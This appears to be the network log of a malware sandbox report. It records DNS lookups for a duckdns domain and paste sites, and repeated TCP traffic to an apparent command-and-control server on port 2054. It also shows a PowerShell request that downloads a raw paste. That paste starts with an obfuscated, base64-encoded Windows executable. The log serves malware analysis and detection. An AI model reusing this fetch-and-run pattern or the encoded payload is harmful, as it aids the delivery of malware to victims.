Sep 24, 2024 23:43:29.431122065 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.435972929 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.436028957 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.440833092 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.440890074 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.445703030 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.446154118 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.451040030 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.451136112 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.456161022 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.456217051 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.461143970 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.462760925 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.467652082 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.467772007 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.472774029 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.472831964 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.477628946 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.477694988 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.482556105 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.482599020 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.487377882 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.488589048 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.493380070 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.493428946 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.498248100 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.498332977 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.503145933 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.503223896 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.510289907 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.510389090 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.516732931 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.516863108 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.521622896 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.521698952 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.526500940 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.526567936 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.531341076 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.531409979 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.538217068 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.538301945 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.544608116 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.544650078 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.551403999 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.551450968 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.558043003 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.558176041 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.563064098 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.563155890 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.567961931 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.568017006 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.574196100 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.574245930 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.579157114 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.579412937 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.584217072 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.584765911 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.589571953 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.589663029 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.604573011 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.604746103 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.609633923 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.612118006 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.616938114 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.616991043 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.621856928 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.621931076 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.626718998 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.629479885 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.634253025 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.634320974 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.639287949 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.641756058 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.646574020 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.646624088 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.651401997 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.654254913 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.659224987 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.659347057 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.664278030 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.664383888 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.669122934 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.696785927 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.701864958 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.701968908 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.706840038 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.706949949 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.711927891 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.712802887 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.717675924 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.717756033 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.722879887 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.723112106 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.728090048 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.728149891 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.732933998 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.733042955 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.737895012 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.737966061 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.743060112 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.745379925 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.750204086 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.750253916 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.755013943 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.755085945 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.759874105 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.759943962 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.764801979 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.764883995 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.769678116 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.770174980 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.774972916 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.775156975 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.780139923 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.795804024 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.800657034 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.802248955 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.807054996 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.834732056 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.839545965 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.847551107 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.852319002 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.891818047 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.896698952 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.901106119 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.906291008 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.930283070 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.935147047 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.935245037 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.940099955 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.940259933 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.945008993 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.945085049 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.949918985 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.949995995 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.954834938 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.978199959 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.993417978 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.993521929 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.998894930 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.000207901 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.005369902 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.005501986 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.011569977 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.011799097 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.016907930 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.017105103 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.022165060 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.022324085 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.027782917 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.027879953 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.032885075 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.058638096 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.063865900 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.068095922 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.277554035 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.384910107 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.536659956 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.536746025 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.537117958 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.537957907 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:30.538861990 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.541652918 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.583194971 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:30.588375092 CEST	56145	2054	192.168.2.5	46.246.14.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 24, 2024 23:42:03.117324114 CEST	57827	53	192.168.2.5	1.1.1.1
Sep 24, 2024 23:42:03.626940966 CEST	53	57827	1.1.1.1	192.168.2.5
Sep 24, 2024 23:42:06.262870073 CEST	53104	53	192.168.2.5	1.1.1.1
Sep 24, 2024 23:42:06.271562099 CEST	53	53104	1.1.1.1	192.168.2.5
Sep 24, 2024 23:42:15.524348974 CEST	60837	53	192.168.2.5	1.1.1.1
Sep 24, 2024 23:42:15.531218052 CEST	53	60837	1.1.1.1	192.168.2.5
Sep 24, 2024 23:42:21.110272884 CEST	53	59247	1.1.1.1	192.168.2.5
Sep 24, 2024 23:42:23.859859943 CEST	57091	53	192.168.2.5	1.1.1.1
Sep 24, 2024 23:42:23.964696884 CEST	53	57091	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 24, 2024 23:42:03.117324114 CEST	192.168.2.5	1.1.1.1	0x689b	Standard query (0)	ftp.desckvbrat.com.br	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:06.262870073 CEST	192.168.2.5	1.1.1.1	0x7c82	Standard query (0)	pastecodeapp.vercel.app	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:15.524348974 CEST	192.168.2.5	1.1.1.1	0xa9ce	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:23.859859943 CEST	192.168.2.5	1.1.1.1	0xd5da	Standard query (0)	notificadoresrma.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 24, 2024 23:42:03.626940966 CEST	1.1.1.1	192.168.2.5	0x689b	No error (0)	ftp.desckvbrat.com.br	desckvbrat.com.br		CNAME (Canonical name)	IN (0x0001)	false
Sep 24, 2024 23:42:03.626940966 CEST	1.1.1.1	192.168.2.5	0x689b	No error (0)	desckvbrat.com.br		191.252.83.213	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:06.271562099 CEST	1.1.1.1	192.168.2.5	0x7c82	No error (0)	pastecodeapp.vercel.app		76.76.21.22	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:06.271562099 CEST	1.1.1.1	192.168.2.5	0x7c82	No error (0)	pastecodeapp.vercel.app		76.76.21.93	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:15.531218052 CEST	1.1.1.1	192.168.2.5	0xa9ce	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:15.531218052 CEST	1.1.1.1	192.168.2.5	0xa9ce	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:15.531218052 CEST	1.1.1.1	192.168.2.5	0xa9ce	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Sep 24, 2024 23:42:23.964696884 CEST	1.1.1.1	192.168.2.5	0xd5da	No error (0)	notificadoresrma.duckdns.org		46.246.14.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastecodeapp.vercel.app

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	76.76.21.22	443	1088	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:06 UTC	120	OUT	GET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1 Host: pastecodeapp.vercel.app Connection: Keep-Alive
2024-09-24 21:42:07 UTC	463	IN	HTTP/1.1 200 OK Age: 0 Cache-Control: public, max-age=0, must-revalidate Content-Type: text/plain;charset=UTF-8 Date: Tue, 24 Sep 2024 21:42:06 GMT Server: Vercel Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch X-Matched-Path: /pastes/[id]/raw X-Vercel-Cache: MISS X-Vercel-Id: iad1::fra1::b47t7-1727214126879-f140305e99b0 Connection: close Transfer-Encoding: chunked
2024-09-24 21:42:07 UTC	2372	IN	Data Raw: 34 30 30 30 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: 4000TVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
2024-09-24 21:42:07 UTC	1724	IN	Data Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 Data Ascii: :::I:::C:::::::::::::::CC:::Eg::::::::::::
2024-09-24 21:42:07 UTC	4744	IN	Data Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f e2 86 93 3a e2 86 93 45 7a e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 45 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 Data Ascii: ::::::::::::::::::::::::BooCg::Bio:Ez:D:E8::::::
2024-09-24 21:42:07 UTC	5930	IN	Data Raw: 49 46 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 64 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 6f 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 6f 66 43 7a 68 7a 2f 76 2f 2f 42 69 67 62 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4c 54 5a 79 35 e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 63 42 73 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 67 5a 79 43 67 59 e2 86 93 3a e2 86 93 63 42 30 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 67 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 68 59 56 4b e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6d 48 77 77 34 50 2f 37 2f 2f Data Ascii: IF:H:dK:s:::YoC:::CgofCzhz/v//Bigb:::KLTZy5:U:cBsoCw::BgZyCgY:cB0oCw::BigN:::KFhYVK:4:::omHww4P/7//
2024-09-24 21:42:07 UTC	1620	IN	Data Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 69 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 78 54 2b e2 86 93 3a e2 86 93 53 31 64 42 33 4d 7a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 49 58 4a 68 6a 57 76 59 70 39 37 6c 4b 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 68 49 71 35 2b 50 4c 79 6d 4f 7a 4d 6f 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6d 38 31 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 6e 4d 32 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 6e 4d 33 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 63 7a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a Data Ascii: ::DiE::::BxT+:S1dB3Mz:::KIXJhjWvYp97lKDQ:::ohIq5+PLymOzMoN:::Cm81:::KFnM2:::KFnM3:::Kczg:::
2024-09-24 21:42:07 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-24 21:42:07 UTC	4096	IN	Data Raw: 34 30 30 30 0d 0a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 30 64 56 53 55 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 73 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6b e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 4e 43 62 47 39 69 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 58 46 51 49 49 43 51 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: 4000::Q::::I0dVSUQ::::sFQ::k:I::CNCbG9i::::::::::I:::FXFQIICQE:::
2024-09-24 21:42:07 UTC	10674	IN	Data Raw: 43 35 e2 86 93 3a e2 86 93 46 49 e2 86 93 3a e2 86 93 69 67 42 35 e2 86 93 3a e2 86 93 4d 4d 43 6a 77 44 42 e2 86 93 3a e2 86 93 44 6f 46 6c 51 42 35 e2 86 93 3a e2 86 93 43 55 47 6d 77 42 35 e2 86 93 3a e2 86 93 4f 6f 43 6f 51 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 45 49 77 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 4c 51 e2 86 93 3a e2 86 93 70 67 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 44 49 77 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 4f 6b e2 86 93 3a e2 86 93 49 77 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 49 4d 47 72 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 46 45 42 74 e2 86 93 3a e2 86 93 44 52 e2 86 93 3a e2 86 93 46 6b 42 42 e2 86 93 3a e2 86 93 44 5a e2 Data Ascii: C5:FI:igB5:MMCjwDB:DoFlQB5:CUGmwB5:OoCoQ:R::QEIw:R:LQ:pg:x::cDIw:x:Ok:Iw:R:IMGr::R:FEBt:DR:FkBB:DZ
